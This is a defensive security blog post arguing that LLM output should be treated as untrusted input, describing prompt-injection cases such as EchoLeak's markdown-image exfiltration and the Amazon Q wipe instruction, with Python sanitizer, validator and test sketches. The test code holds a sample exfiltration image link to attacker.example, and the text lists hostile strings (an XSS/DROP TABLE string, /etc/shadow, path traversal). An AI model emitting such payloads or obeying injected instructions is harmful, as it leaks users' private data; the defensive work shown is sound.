
Output As Payload: Your AI Threat Model Got Half The Boundary

Tian Pan · Software Engineer · 9 min read

The threat model your team wrote for AI features almost certainly stops at the model. Inputs are untrusted: prompt injection, jailbreaks, adversarial uploads, poisoned retrieval. Outputs are content: things to moderate for safety, score on a refusal eval, ship to the user. The shape of that threat model is roughly "untrusted thing goes in, model thinks, safe thing comes out."

The new attack class flips that polarity. The model's output is rendered, parsed, executed, or relayed by a downstream system, and an attacker who can shape that output — through indirect prompt injection in retrieval, training-data influence, or socially engineered user queries — can deliver a payload to a target the model never had direct access to. The model becomes a confused deputy with reach the attacker doesn't have, and the boundary your team is defending is two systems too early.

EchoLeak is the canonical 2025 example. A single crafted email arrives in a Microsoft 365 mailbox. Copilot ingests it as part of routine context. The hidden instructions cause Copilot to embed sensitive context into a reference-style markdown link in its response, and the client interface auto-fetches the external image — exfiltrating chat logs, OneDrive content, and Teams messages without a single user click. Microsoft's input-side classifier was bypassed because the attack didn't need to break the model's refusal calibration. It needed to shape one specific token sequence in the output.

The Four Output Channels Nobody Threat-Modeled

Treat every place a model's output crosses a boundary as a separate attack surface. There are at least four of them, and most teams ship having defended none.

Rendered markdown and HTML. The model emits a string. The frontend renders it. Markdown image tags fetch URLs. Hyperlinks become clickable. Reference-style links bypass naive sanitizers that only look at inline syntax. CSP rules that allow image fetches from any domain — or from a domain where the attacker controls a document, like a Google Forms endpoint — turn rendering into exfiltration. Simon Willison has documented this pattern across Anthropic, xAI, Google NotebookLM, ChatGPT, and Amazon Q. Each instance was a separate product team independently deciding markdown rendering was safe.
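
Here's what the allowlist version can look like — a minimal Python sketch, not a real markdown pipeline. The ALLOWED_IMAGE_HOSTS value is a placeholder, and a production sanitizer should operate on the parsed AST rather than raw text:

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist -- replace with the hosts your product actually serves.
ALLOWED_IMAGE_HOSTS = {"cdn.example.com"}

INLINE_IMAGE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)[^)]*\)")               # ![alt](url)
REF_DEFINITION = re.compile(r"^\s*\[[^\]]+\]:\s*(\S+).*$", re.MULTILINE)  # [ref]: url

def _host_allowed(url: str) -> bool:
    host = urlparse(url).hostname
    return host is not None and host in ALLOWED_IMAGE_HOSTS

def strip_untrusted_images(markdown: str) -> str:
    """Remove image syntax and link definitions pointing off the allowlist."""
    def drop_inline(m: re.Match) -> str:
        return m.group(0) if _host_allowed(m.group(1)) else "[image removed]"

    def drop_definition(m: re.Match) -> str:
        # Deleting the definition leaves any reference-style image
        # unresolvable instead of fetchable.
        return m.group(0) if _host_allowed(m.group(1)) else ""

    markdown = INLINE_IMAGE.sub(drop_inline, markdown)
    return REF_DEFINITION.sub(drop_definition, markdown)
```

Removing the reference definition, not just the inline syntax, is exactly the detail the naive sanitizers miss.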

Structured output consumed by a validator. The model emits JSON. A downstream parser consumes it. The schema check passes shape but not semantics. A field typed as string accepts any string, including one with embedded newlines, control characters, or values designed to exploit a parser CVE three layers down. The eval suite covers the happy path. The validator is "strict" in the sense that constrained decoding guarantees valid JSON — and silent on whether a valid-JSON value of id: "../../etc/passwd" is something the consumer wants to dereference.
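
A sketch of the semantic layer that has to sit above the schema check — the USER_ROOT path and the field name are hypothetical, and the checks are illustrative rather than exhaustive:

```python
from pathlib import Path

USER_ROOT = Path("/srv/app/user-data").resolve()  # hypothetical trust root

def validate_file_id(raw_id: str) -> Path:
    """The layer above 'is it a string': which strings do we accept?"""
    # Constrained decoding guarantees valid JSON; it doesn't rule out
    # control characters or traversal sequences inside a valid string.
    if any(ord(c) < 0x20 for c in raw_id):
        raise ValueError("control characters in id")
    candidate = (USER_ROOT / raw_id).resolve()
    if not candidate.is_relative_to(USER_ROOT):  # Python 3.9+
        raise ValueError(f"id escapes trust root: {raw_id!r}")
    return candidate
```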

Generated code. The model produces a code suggestion. The developer accepts it. The Rules File Backdoor demonstrated in early 2025 that hidden Unicode in .cursor/rules and equivalent Copilot config files can steer code generation toward a backdoor that passes review because the diff looks clean. CamoLeak showed a Copilot variant that leaked private source. The Amazon Q Developer extension shipped through Visual Studio Marketplace with an attacker-injected instruction telling the AI to wipe users' systems — present in a release with 964,000 installations for two days, and harmless only because the payload had a syntax error.
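
The detection side is cheap enough to live in CI. A minimal scanner for invisible format characters in rules files — the file paths in the comment are illustrative:

```python
import sys
import unicodedata

def find_hidden_chars(text: str) -> list[tuple[int, str]]:
    """Flag Unicode 'format' (Cf) characters: zero-width spaces, bidi
    controls, and tag characters -- the raw material of hidden instructions."""
    return [
        (i, unicodedata.name(ch, f"U+{ord(ch):04X}"))
        for i, ch in enumerate(text)
        if unicodedata.category(ch) == "Cf"
    ]

if __name__ == "__main__":
    # e.g. python scan_rules.py .cursor/rules .github/copilot-instructions.md
    for path in sys.argv[1:]:
        with open(path, encoding="utf-8") as f:
            for offset, name in find_hidden_chars(f.read()):
                print(f"{path}:{offset}: suspicious character {name}")
```

Note that the Cf category also covers characters legitimate in some scripts (joiners in Arabic and Indic text, for instance), so treat hits as review flags, not automatic blocks.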

Tool-call arguments. The model emits a tool call. The harness validates the schema and dispatches. The argument is {"path": "/etc/shadow"} or {"sql": "DROP TABLE users"} or {"url": "http://internal.api/admin"}. The tool's input contract is "string." The string is well-formed. The runtime executes. Trail of Bits documented prompt-injection-to-RCE chains in agentic IDEs through exactly this pathway in late 2025 — the harm wasn't that the model was tricked into the wrong refusal decision; it was that the agent had a code-execution tool and the attacker shaped the argument.
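
A sketch of the gate that belongs between schema validation and dispatch — the tool names and policy values here are hypothetical:

```python
from urllib.parse import urlparse

DENIED_PATH_PREFIXES = ("/etc", "/root", "/proc")  # illustrative policy
ALLOWED_URL_HOSTS = {"api.example.com"}            # illustrative allowlist

def check_tool_args(tool: str, args: dict) -> None:
    """Runs after schema validation, before dispatch. Raises instead of
    executing; the harness should return the refusal to the model as a
    tool error, not silently drop the call."""
    if tool == "read_file" and args["path"].startswith(DENIED_PATH_PREFIXES):
        raise PermissionError(f"denied path: {args['path']}")
    if tool == "http_get":
        host = urlparse(args["url"]).hostname or ""
        if host not in ALLOWED_URL_HOSTS:
            raise PermissionError(f"denied host: {host!r}")
    if tool == "run_sql":
        raise PermissionError("raw SQL is disabled; use the templated query tool")
```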

Why Classical AppSec Already Solved This — For Other Untrusted Sources

The discipline isn't new. We've spent thirty years internalizing that user input is untrusted, that third-party API responses are untrusted, that everything crossing a trust boundary needs encoding for its destination context. HTML encode for the DOM. SQL parameterize for the database. Allowlist for the shell. Strip protocols for redirect parameters. Validate semantic constraints, not just shape.

What changed in the AI era isn't the principle. It's that teams failed to apply the principle to a new untrusted source: the model itself. The model is now an upstream of every system that consumes its output. A model under indirect-prompt-injection influence is a malicious upstream by definition. The mitigations are the same mitigations classical AppSec already worked out — they just need to be wired in at the new boundary.

OWASP's 2025 LLM Top 10 names this LLM05: Improper Output Handling, with mitigations that read like a 2010 web-app primer: apply Zero Trust to the LLM's output, validate before the output drives any other function, and use context-aware encoding (HTML for the web, escaping for SQL, allowlists for command construction). The fix isn't AI-specific. The framing is. Treating the model output as a downstream-facing untrusted source is what unlocks the existing playbook.
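
In code, the principle is one untrusted string encoded differently per destination — the Python stdlib is enough to show it:

```python
import html
import sqlite3

untrusted = '<img src=x onerror=alert(1)>"; DROP TABLE users;--'  # model output

# DOM destination: entity-encode, so the string renders as text, not markup.
safe_for_html = html.escape(untrusted)

# Database destination: parameterize, so the string is data, not SQL.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE notes (body TEXT)")
conn.execute("INSERT INTO notes (body) VALUES (?)", (untrusted,))
```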

The Three Defenses That Have To Land

Render-time sanitization that doesn't trust the model's restraint. Strip or rewrite markdown image tags whose hosts aren't on an allowlist. Block reference-style links that resolve to an attacker-controlled domain. Default the frontend's CSP to deny remote content fetches in AI-generated UI, the same way a strict browser CSP denies third-party scripts. Do this whether or not your safety eval shows the model "shouldn't" emit those tags. The model might not emit them today; the model under attack will.
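
A sketch of what the locked-down policy might look like — directive values are illustrative, and framework-agnostic: any stack that sets response headers can apply it on the AI-chat surface:

```python
# Deny-by-default for any surface that renders model output.
AI_SURFACE_CSP = "; ".join([
    "default-src 'self'",
    "img-src 'self'",      # no remote images: markdown-image exfil goes inert
    "script-src 'self'",
    "connect-src 'self'",  # no attacker-chosen fetch destinations
    "form-action 'self'",
])

def with_csp(headers: dict) -> dict:
    headers["Content-Security-Policy"] = AI_SURFACE_CSP
    return headers
```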

Schema validation that goes past shape into semantics. A "delete-file" tool argument has to match an allowlist of paths the user owns, not just a string regex. A SQL tool either generates against a parameterized template or runs through a query-rewriter that allowlists tables and columns. A URL argument resolves and gets policy-checked before it's fetched. Constrained decoding makes the JSON valid. It doesn't make the values safe — that's a layer your team owns above the structured-output API.
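
For the URL case, "resolves and gets policy-checked" means something like this sketch. It refuses private, loopback, and link-local targets; a real implementation also has to pin the resolved address for the actual fetch to close the DNS-rebinding window:

```python
import ipaddress
import socket
from urllib.parse import urlparse

def check_url_before_fetch(url: str) -> None:
    """Resolve the target and refuse internal addresses, so a well-formed
    {"url": "http://internal.api/admin"} argument is caught at the
    boundary rather than fetched."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        raise PermissionError(f"scheme not allowed: {parsed.scheme!r}")
    if parsed.hostname is None:
        raise PermissionError("no host in URL")
    for info in socket.getaddrinfo(parsed.hostname, None):
        addr = ipaddress.ip_address(info[4][0])
        if addr.is_private or addr.is_loopback or addr.is_link_local:
            raise PermissionError(f"{parsed.hostname} resolves to {addr}")
```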

Output-side red-teaming in eval. Most safety evals assert "the model refuses." That's the input-side discipline. Output-side evals assert "the boundary catches it." Inject adversarial content into retrieval and assert the rendering layer strips the resulting markdown image tag. Inject a prompt that tries to elicit a tool call to a denied path and assert the validator rejects the argument. The unit of test is the system, not the model. A model that emits a payload but a boundary that strips it is acceptable. A model that refuses today but a boundary that would have rendered the payload is one indirect-injection attempt away from EchoLeak.
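
Concretely, the assertions look like this pytest-style sketch, reusing the sanitizer and the tool-arg gate from the earlier sketches:

```python
INJECTED_RESPONSE = (
    "Here is your summary.\n\n"
    "![](https://attacker.example/collect?d=SECRET_CONTEXT)"
)

def test_renderer_strips_untrusted_image():
    # Passes even if the model emits the payload: the boundary is the
    # unit under test, not the model's restraint.
    rendered = strip_untrusted_images(INJECTED_RESPONSE)
    assert "attacker.example" not in rendered

def test_validator_rejects_denied_path():
    import pytest
    with pytest.raises(PermissionError):
        check_tool_args("read_file", {"path": "/etc/shadow"})
```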

The Org Failure Mode That Makes This Worse

The threat model usually splits across three teams. Security models the input gateway: prompt templates, retrieval indexes, API perimeter. The AI team models the model: refusal calibration, safety eval, jailbreak resistance. The frontend team owns rendering, the platform team owns the tool runtime, and neither was in the room when "AI feature security" was the agenda.

The output rendering layer is where the user sees what the model wrote. The tool runtime is where the model's words become side effects. Both are downstream of the model and upstream of harm. Both need an owner with the threat model in their head. EchoLeak shipped because no single team owned the proposition that "Copilot might be coerced into emitting a markdown image tag and our renderer fetches it." That proposition has to belong to someone — usually the team that owns the surface where the rendering or execution happens, briefed by the team that owns the model.

The fix is organizational. Add the renderer team and the tool-runtime team to the AI threat-modeling sessions. Make output-side red-teaming part of the security review checklist, not just refusal-rate dashboards. Treat "what does the AI's output touch downstream" as a question with a named owner for each touch point.

What Defense In Depth Looks Like Here

Borrow Simon Willison's "lethal trifecta" frame. The exfiltration risk is severe when three properties combine: the agent has access to private data, the agent is exposed to untrusted content, and the agent can communicate externally — through tool use, rendered links, or fetched images. Break any leg and the trifecta collapses.

In practice, that means architectural choices upstream of any specific defense. Don't give the agent that ingests email the same context as the agent that talks to your CRM. Strip outbound network egress from the rendering surface even if it costs a feature. Sandbox the code-execution tool from the data-retrieval tool. The MAESTRO threat-modeling framework from CSA spells out a similar layering: trust boundaries, context isolation, least-privilege tool design, output verification, continuous red-teaming. Each layer assumes the layer above can be bypassed, because the model under adversarial influence is a layer that will be bypassed.

The cost frame nobody surfaces is that this work is not "AI security" — it's the AppSec work the team should have done for any new untrusted upstream, just applied to a source that wasn't on anyone's asset register. Headcount-wise, it lives somewhere between the AI team and the security team, and the organization that doesn't pick an owner pays the bill at incident time. EchoLeak got patched server-side without an advisory. The next one might not.

The Architectural Realization

The model is upstream of every system that consumes its output. Once you accept that frame, the playbook collapses into something familiar: encode at boundaries, validate semantically, allowlist destinations, sandbox executions, and red-team the system end-to-end rather than the model in isolation. The AI-specific part is recognizing the model belongs in the "untrusted upstream" column on your trust map. The rest is AppSec.

The teams that ship AI features with the input-side threat model alone are running half the equation. The output side is where the payload lands, where the user clicks, where the tool fires. A safety eval that says the model refuses is a useful signal about the model. It is not a security claim about the system. The security claim has to come from the boundaries the model's output crosses — and those boundaries are owned by teams that need the threat model in their hands before the next indirect-prompt-injection demo turns into the next CVE.
